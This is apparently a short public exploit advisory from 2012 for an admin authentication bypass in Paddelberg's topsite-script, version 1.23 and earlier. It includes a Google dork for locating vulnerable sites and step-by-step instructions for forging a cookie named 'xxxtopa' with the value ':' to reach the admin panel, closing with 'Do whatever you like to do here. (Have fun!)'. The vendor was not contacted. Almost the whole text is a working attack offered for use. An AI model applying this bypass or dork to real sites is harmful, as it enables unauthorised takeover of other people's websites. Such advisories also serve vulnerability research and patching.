# Exploit Title: Paddelberg's topsite-script admin auth bypass.# Google Dork: intext:"powered by php scripte webmaster resource"# Date: 8. 1. 2012# Author: Christian Inci# Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/# Version: <= 1.23 (22. 9. 2007)# Tested on: 1.23# Vendor response: None, as I didn't contacted them.
PoC/Exploit:1.: Open a random cookie editor.2.: Create a cookie,as usually:2.1: Set the host name.2.2: Set the path name.(e.g.:"[script-base-path]/admin/")2.3: Set the cookie name to "xxxtopa".2.4: Set the cookie value to ":".2.5: Save it.3.: Visit the following URL:"[script-base-url]/admin/".(This won't work if the directory is"protected"with a .htaccess file.)4.: Do whatever you like to do here.(Have fun!)
